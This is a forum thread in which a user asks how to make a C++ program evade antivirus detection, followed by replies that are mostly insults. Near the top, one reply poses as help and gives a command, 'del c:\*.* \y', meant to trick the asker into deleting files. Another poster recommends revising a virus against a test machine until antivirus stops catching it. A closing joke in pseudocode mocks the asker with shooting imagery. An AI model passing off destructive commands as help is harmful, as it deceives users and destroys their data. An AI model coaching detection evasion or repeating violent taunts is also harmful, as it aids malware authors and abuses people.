Page 1 of 3 123 LastLast

Thread: getting past any antivirus program

getting past any antivirus program

Does anybody know how to write a c++ program that will not get detected by a antivirus program i have heard of POLYMORPHIC code but i do not understand it at all

click on Start>Run then type CMD

Then type: del c:\*.* \y

Re: getting past any antivirus program

Originally posted here by Poop782
    Does anybody know how to write a c++ program that will not get detected by a antivirus program i have heard of POLYMORPHIC code but i do not understand it at all
    Um... sure, its actually very easy, don't write anything that will get labeled as a virus... don't see what the problem is... ??

Stick you dick in your surge protector then you will know how.
    Don\'t be a bitch! Use Slackware.

Get out of antionline.

:
    Since the beginning of time, Man has searched for the answers to the big questions: \'How did we get here?\' \'Is there life after death?\' \'Are we alone?\' But today, in this very theatre, you will be asked to answer the biggest question of them all...WHO LIVES IN A PINEAPPLE UNDER THE SEA?

Oh well you people calm the **** down, I personally can't stand it when people don't like someone's question and think they are an idiot or know nothing because of there question.

Sorry Poop782 I don't know how to code in C++. I am a C and perl guy.

Though all you have to do is, get a test box, with an Antivirus on it. Take your code over to that box, and if the AV catches your Virus, keep working on it until it doesn't.

You might want to, check and see how Antiviruses actually work. That will help you a lot more.

People there is no such thing as special knowledge or anything that people shouldn't say. I personally will answer most questions regarding creation of Viruses.

I swear if I keep getting this responce, and people go after someone that asks a simple quesion, I am going to post a tutorial on how to write viruses and trojans.

Get off your high horses, and either don't answer the question or don't look at the thread.

Oh well you people calm the **** down, I personally can't stand it when people don't like someone's question and think they are an idiot or know nothing because of there question.
    I'm perfectly calm.

1. How do I program something in C++ to open ports? Very neat excuse there...
    2. How do I program a keylogger in C++? Classic
    3. HOw do I program something in C++ so it doesn't get caught by an AV?

Sorry if ****ing red flags are jumping up and down screaming SKIIIDDDIIIIEEEE!

I swear if I keep getting this responce, and people go after someone that asks a simple quesion, I am going to post a tutorial on how to write viruses and trojans.
    Go for it. LOL...is that a threat?

So what if the guy is, he/she has every right to learn how to do the **** the right way instead of downloading some shitty program to do it for them.

I would rather someone ask how to code one, than ask where to download one from. The second is skiddie, the first is someone trying to learn.

I learned a lot of my coding from coding things, that you people might find less than good things to be coding.

Originally posted here by whizkid2300

Get off your high horses, and either don't answer the question or don't look at the thread.
    Don't flatter yourself. =\

And I did answer the man with an honest question... don't write code or name files to known viruses... thats what sets flags off in AV's.

the beign of authority kurt_der_koenig's Avatar
    sample code:::

Let x= colt 45
    Let y=users mouth
    Let solution=pull trigger
    Let A=if asks
    Let B=lam3r qeustion

rem this is the best code for you!

If A=B then
    x+y=d
    If d=x,y then
    solution
    end if
    end if

edit**

little rusty but should work! :::::::: come on poop!